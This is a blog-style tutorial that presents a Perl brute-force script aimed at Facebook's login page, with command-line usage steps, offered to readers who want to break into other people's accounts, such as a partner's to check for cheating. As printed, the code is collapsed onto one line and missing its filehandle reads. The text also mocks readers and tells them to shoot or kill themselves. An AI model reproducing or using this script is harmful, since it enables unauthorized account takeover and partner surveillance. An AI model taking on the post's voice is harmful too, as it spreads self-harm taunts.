How to hack Facebook accounts.

I've been around watching a bunch of dudes trying to "regain access to their accounts". Aka. Yeah dude, I need to hack my girlfriend, I want to see if shes cheating on me :(

If you know who I am, you know I'm most of my time in the AnonOps IRC network at CLICK HERE. I'm most of my time in that net because of the bunch of people I know, besides, I like helping new users, newfags, and because I'm pretty good in what I love (trolling).

This kinda sucks. If you can't be with someone in good terms, you should just get someone else or be a fucking :foreveralone:

Here is the thing:
I got so fucking annoyed about this kind of requests that I thought: Why not? I should create a tutorial for this kind of helpless motherfuckers so they can be useless all the time.

Just a fair warning, if you DO NOT know a shit about how to run a simple PERL script then you should get a gun a shoot yourself in the face :D

All we need is a Linux distribution (even that piece of useless shit called Ubuntu). Or, if you are a Winshit (Windows) user, have all the PERL libraries installed. If you don't have them, just get them here. Besides this, you will need a list of passwords. Yeah, like a fucking dictionary. To make things easier, you can get a large list of common password using the link -> This shit. If this isn't enough, remember that you can always Google or Duckduck or whatever the fuck you want.

Once you've meet the previous requirements, you'll need an exploit (like a 1337 guy).

Since Facebook (like Twitter) isn't implementing a Captcha (and I don't think they will any time soon), we can use a BruteForce method to rape almost any Facebook (and Twitter) account.

The exploit to be used is pretty simple:

#!/usr/bin/perl# # Usage: perl fuckbook.pl Test_Account@omgwtfbbq.net test.lst use strict; use Net::SSLeay::Handle; if(!defined($ARGV[0] && $ARGV[1])) { system('clear'); print "#################################################################\n"; print " _____ ____ _ __ | ___|_ _ ___ ___| __ ) ___ ___ | |/ / | |_ / _` |/ __/ _ \\ _ \\ / _ \\ / _ \\| ' / | _| (_| | (_| __/ |_) | (_) | (_) | . \\ |_| \\__,_|\\___\\___|____/ \\___/ \\___/|_|\\_\\"; print "\n\n#################################################################"; print "--- Usage: perl $0 login wordlist\n\n"; exit; } my $user = $ARGV[0]; my $wordlist = $ARGV[1]; open (LIST, $wordlist) || die "\n[-] Can't find/open $wordlist\n"; print "#################################################################\n"; print " _____ ____ _ __ | ___|_ _ ___ ___| __ ) ___ ___ | |/ / | |_ / _` |/ __/ _ \\ _ \\ / _ \\ / _ \\| ' / | _| (_| | (_| __/ |_) | (_) | (_) | . \\ |_| \\__,_|\\___\\___|____/ \\___/ \\___/|_|\\_\\"; print "\n\n#################################################################"; print "\n\n[+] Cracking user : $user ...\n\n"; while (my $password = ) { chomp ($password); $password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg; my $a = "POST /login.php HTTP/1.1"; my $b = "Host: www.facebook.com"; my $c = "Connection: close"; my $e = "Cache-Control: max-age=0"; my $f = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; my $g = "Origin: https://www.facebook.com"; my $h = "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"; my $i = "Content-Type: application/x-www-form-urlencoded"; my $j = "Accept-Encoding: gzip,deflate,sdch"; my $k = "Accept-Language: en-US,en;q=0.8"; my $l = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3"; my $cookie = "cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa"; my $post = "lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In"; my $cl = length($post); my $d = "Content-Length: $cl"; my ($host, $port) = ("www.facebook.com", 443); tie(*SSL, "Net::SSLeay::Handle", $host, $port); print SSL "$a\n"; print SSL "$b\n"; print SSL "$c\n"; print SSL "$d\n"; print SSL "$e\n"; print SSL "$f\n"; print SSL "$g\n"; print SSL "$h\n"; print SSL "$i\n"; print SSL "$j\n"; print SSL "$k\n"; print SSL "$l\n"; print SSL "$cookie\n\n"; print SSL "$post\n"; my $success; while(my $result = ){ if($result =~ /Location(.*?)/){ $success = $1; } } if (!defined $success){ print "[-] $password -> Failed\n"; close SSL; }else{ print "\n########################################################\n"; print "[+] CRACKED! Your password is $password\n"; print "########################################################\n\n"; close SSL; exit; } }

<-------------------------------------------------------------->

Basically, all you need to do, is enter in the command line interface the following: perl fuckbook.pl Test_Account@omgwtfbbq.net test.lst.

In case you are fucking dumb, notice the following:
"perl fuckbook.pl Test_Account@omgwtfbbq.net test.lst"
- "perl" will invoke the interpret of PERL (programming language (sort of)).
- "fuckbook.pl" is the name of the exploit in this example.
- "Test_Account@omgwtfbbq.net" is the account (email/login address) name in this example.
- "test.lst" is the file containing the passwords list.


Hope you can stop crying like a baby with this. Note that if you are unable to follow this clear example, then you should better pay someone to kill you :D

More shits coming!!!

Comments

Popular Posts